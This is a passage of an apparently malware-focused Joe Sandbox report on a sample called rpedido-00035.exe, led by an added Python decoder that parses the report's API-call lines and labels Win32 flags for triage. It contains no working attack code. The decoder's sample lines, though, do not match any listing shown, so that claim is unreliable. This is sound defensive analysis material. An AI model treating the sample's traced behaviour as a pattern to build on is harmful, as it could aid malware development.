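Added example, not part of the Joe Sandbox report: a small Python decoder for the API reference lines in the listings above. It parses the `Name.Module(args), ref: addr` line format (including the "Part of subcall function" prefix and lines with no argument list, such as the wsprintfW entry) and decodes the arguments that carry triage meaning: the VirtualProtect protection constant at ref 100027E0 (00000040 is PAGE_EXECUTE_READWRITE, applied to 4 bytes at 1000405C inside the 10000000 module), the CreateProcessW creation flags at ref 004059BE (04000000 is CREATE_DEFAULT_ERROR_MODE alone, so this call site does not start its child suspended), and the GlobalAlloc and SetClipboardData constants in the clipboard sequence at 00405887..004058D6 (00000042 is GMEM_MOVEABLE|GMEM_ZEROINIT, 0000000D is CF_UNICODETEXT). The constant tables are documented Win32 values; the sample lines are copied from this listing; the triage notes it emits are this example's own heuristics, not Joe Sandbox output.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API reference lines in the report's own format, copied
# from the entries above (a VirtualProtect, a subcall CreateProcessW, two
# calls from the clipboard sequence, and a line without an argument list).
SAMPLE_LINES = [
    "• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0",
    "  • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE",
    "• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887",
    "• SetClipboardData.USER32(0000000D,00000000), ref: 004058D0",
    "• wsprintfW.USER32 ref: 00406304",
]

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# Documented Win32 constants (winnt.h / winbase.h / winuser.h).
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
CREATE_FLAGS = {0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
                0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
                0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x00040000: "EXTENDED_STARTUPINFO_PRESENT",
                0x01000000: "CREATE_BREAKAWAY_FROM_JOB", 0x04000000: "CREATE_DEFAULT_ERROR_MODE",
                0x08000000: "CREATE_NO_WINDOW"}
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}
CF_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 7: "CF_OEMTEXT", 8: "CF_DIB",
              13: "CF_UNICODETEXT", 15: "CF_HDROP"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                 # raw argument strings as printed; "?" means unknown
    ref: Optional[str]         # address of the call instruction
    subcall_of: Optional[str]  # function the call was attributed to, if a subcall


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Arguments are unquoted and comma-separated, so a string argument that
    # itself contains a comma would be split here; none in this report does.
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub"))


def as_int(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None  # "?", a symbol, or a string literal


def decode_bits(value: int, table: dict) -> list:
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")  # bits the table does not cover
    return names


def triage(call: ApiCall) -> dict:
    """Decode the arguments that matter for triage; leave the rest raw."""
    out = {"api": call.api, "ref": call.ref, "notes": []}
    a = call.args
    if call.api == "VirtualProtect" and len(a) >= 3 and (prot := as_int(a[2])) is not None:
        base = prot & 0xFF
        out["protect"] = [PAGE_PROT.get(base, f"0x{base:X}")] + decode_bits(prot & ~0xFF, PAGE_MODIFIERS)
        out["address"], out["size"] = a[0], as_int(a[1])
        if base & 0xC0:  # EXECUTE_READWRITE or EXECUTE_WRITECOPY: writable and executable
            out["notes"].append("writable+executable page")
    elif call.api in ("CreateProcessW", "CreateProcessA") and len(a) >= 6 and (fl := as_int(a[5])) is not None:
        out["creation_flags"] = decode_bits(fl, CREATE_FLAGS)
        if fl & 0x4:
            out["notes"].append("process starts suspended (check for hollowing/injection)")
    elif call.api == "GlobalAlloc" and a and (fl := as_int(a[0])) is not None:
        out["alloc_flags"] = decode_bits(fl, GMEM_FLAGS) or ["GMEM_FIXED"]
    elif call.api == "SetClipboardData" and a and (fmt := as_int(a[0])) is not None:
        out["format"] = CF_FORMATS.get(fmt, f"0x{fmt:X}")
        out["notes"].append("writes to the clipboard")
    return out


def triage_lines(lines) -> list:
    return [triage(c) for c in map(parse_api_line, lines) if c]


if __name__ == "__main__":
    for row in triage_lines(SAMPLE_LINES):
        print(row)
```

The regex keeps the raw argument strings rather than guessing types, because the report prints pointers, integers, "?" placeholders and inline string literals in the same positional slot; only the slots whose meaning is fixed by the API prototype (the protection constant, the creation flags, the allocation flags, the clipboard format) are decoded. Feed it the other "APIs" lines in this report to get the same decoding for every call site.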
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                          • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                          • DeleteObject.GDI32(00000000), ref: 00404E86
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                          • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                          • GlobalFree.KERNEL32(?), ref: 004051C0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00405311
                                                          • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                          • ShowWindow.USER32(00000000), ref: 00405371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                          • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                          • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                          • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                            • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                            • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                            • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                            • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                            • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                            • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                          • API String ID: 2624150263-212780734
                                                          • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                          • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                          • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                          • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins, xrefs: 004021BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins
                                                          • API String ID: 542301482-3607167448
                                                          • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                          • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                          • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                          • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                          • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                          • Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                          • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                          • ShowWindow.USER32(?), ref: 00403EC5
                                                          • DestroyWindow.USER32 ref: 00403ED9
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                          • GetDlgItem.USER32(?,?), ref: 00403F16
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                          • GetDlgItem.USER32(?,?), ref: 00403FDF
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404054
                                                          • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                          • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                          • EnableWindow.USER32(?,?), ref: 0040412D
                                                          • EnableWindow.USER32(?,?), ref: 00404148
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415E
                                                          • EnableMenuItem.USER32(00000000), ref: 00404165
                                                          • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417D
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 184305955-3251261122
                                                          • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                          • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                          • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                          • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404580
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                          • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045B1
                                                          • GetSysColor.USER32(?), ref: 004045C2
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                          • lstrlenW.KERNEL32(?), ref: 004045E3
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                          • SendMessageW.USER32(00000000), ref: 00404665
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                          • SetCursor.USER32(00000000), ref: 004046E4
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                          • SetCursor.USER32(00000000), ref: 00404700
                                                          • SendMessageW.USER32(00000111,?,00000000), ref: 0040472F
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: Call$N$YD@
                                                          • API String ID: 3103080414-3276248472
                                                          • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                          • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                          • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                          • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                          • wsprintfA.USER32 ref: 0040607B
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
